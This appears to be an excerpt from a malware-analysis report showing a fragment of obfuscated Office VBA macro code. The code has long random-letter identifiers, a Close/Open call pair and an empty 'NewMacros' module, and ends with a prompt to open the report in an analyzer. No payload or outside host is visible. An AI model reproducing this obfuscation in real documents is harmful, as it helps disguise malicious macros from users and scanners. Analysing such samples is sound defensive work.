LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV.Close End If BHMEEXQEPVDTCVXKEDZJHSEQTRWYGQRWBYNUEOXVQGKKKMFBFTBZIKLHTCXPHISGJPUFMGYMXWLCKDFSGLIRPBMYUSYHOYSXJHVWMWZEXOSSRUGJNCJIQSTPCJGXOQBOQXVNUHHUYFTDSFNBNTQZRDUZDBGPWZBGRPEFUXILGWTUTVORVERQY.Open (VGJEURSRTMPTCPOWRSOBPFEUPZUQWCTTNNBFLZJYLTZTSPYXJBGJHMVVGHMXODLBENRMDZBZCURUKWPXZBWJXNFDXIDYFKCCVOCNTBRZTVICBXHFQCORPUWEOPUYWLSCMVTOEIIIKDYDRYXGIJFRZVNFGQEHNSDKEWKVUJZIBDQEJGPNYKWSQWFM) End Sub Attribute VB_Name = "NewMacros" Sub macro() ' ' macro Macro ' ' End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.